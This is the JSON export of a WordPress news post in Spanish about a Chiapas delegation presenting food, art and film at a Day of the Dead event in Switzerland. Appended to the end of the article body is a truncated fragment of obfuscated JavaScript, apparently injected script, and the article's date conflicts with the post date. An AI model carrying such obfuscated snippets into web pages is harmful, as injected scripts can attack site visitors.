{"id":19083,"date":"2024-11-30T05:29:23","date_gmt":"2024-11-30T05:29:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19083"},"modified":"2024-11-30T05:29:24","modified_gmt":"2024-11-30T05:29:24","slug":"la-fiesta-de-las-almas-de-chiapas-deslumbro-en-suiza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19083","title":{"rendered":"La Fiesta de las Almas de Chiapas deslumbr\u00f3 en Suiza"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035-1024x768.jpg\" alt=\"\" class=\"wp-image-19084\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241129-WA0035.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>29 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- En conferencia de prensa se dio a conocer las actividades realizadas dentro de la Fiesta de las Almas (K&#8217;in Ch&#8217;ulelal, en lengua tsotsil) que se presentaron con gran \u00e9xito en la capital suiza durante la celebraci\u00f3n del D\u00eda de Muertos, como parte de un evento organizado por la embajada de M\u00e9xico en Suiza.<\/p>\n\n\n\n<p>&#8220;Una delegaci\u00f3n representativa de Chiapas acudi\u00f3 para mostrar lo m\u00e1s destacado de la gastronom\u00eda, el arte y la cultura del estado, gracias al apoyo de la iniciativa privada, sin intervenci\u00f3n gubernamental&#8221;, manifestaron los organizadores.<\/p>\n\n\n\n<p>Entre los participantes destac\u00f3 Mavi Ram\u00edrez V\u00e1zquez , promotora cultural y organizadora de eventos en Chiapas, quien lider\u00f3 la delegaci\u00f3n. Enrique Torres Batiz , director de Turismo de Grupo Farrera, tambi\u00e9n estuvo presente en la promoci\u00f3n del estado.<\/p>\n\n\n\n<p>El evento incluy\u00f3 una muestra culinaria a cargo del reconocido chef chiapaneco Jorge Gordillo , quien sirvi\u00f3 m\u00e1s de 700 bocadillos para el cuerpo diplom\u00e1tico y ofreci\u00f3 dos clases magistrales en las que compartieron los secretos de la gastronom\u00eda tradicional de Chiapas.<\/p>\n\n\n\n<p>En el \u00e1mbito art\u00edstico, Andr\u00e9s L\u00f3pez Tex expuso una serie de pinturas inspiradas en la tem\u00e1tica del D\u00eda de Muertos y ofreci\u00f3 talleres de pintura en hojas secas, generando inter\u00e9s entre los asistentes. Asimismo, se disfrut\u00f3 de un concierto de cuerdas tradicionales que dio un toque sonoro \u00fanico al evento. Por su parte, Ant\u00fan M\u00e9ndez , director y productor del cortometraje PUKUJ , comparti\u00f3 las leyendas de Chamula a trav\u00e9s de su obra cinematogr\u00e1fica, que cautiv\u00f3 al p\u00fablico.<\/p>\n\n\n\n<p>&#8220;Este esfuerzo colectivo, respaldado por la iniciativa privada, reafirma el compromiso de los artistas y promotores culturales chiapanecos de llevar las tradiciones de su tierra a escenarios internacionales. La presentaci\u00f3n de La Fiesta de las Almas en Suiza dej\u00f3 una profunda impresi\u00f3n en los asistentes, quienes pudieron acercarse al misticismo y riqueza cultural de Chiapas&#8221;, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 29 de diciembre del 2024. San Crist\u00f3bal de Las Casas.- En conferencia de prensa se dio a conocer las actividades realizadas dentro de la Fiesta de las Almas (K&#8217;in Ch&#8217;ulelal, en lengua tsotsil) que se presentaron con gran \u00e9xito en la capital suiza durante la celebraci\u00f3n del D\u00eda de Muertos, como parte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19084,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19083","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19083","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19083"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19083\/revisions"}],"predecessor-version":[{"id":19085,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19083\/revisions\/19085"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19084"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19083"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19083"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19083"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}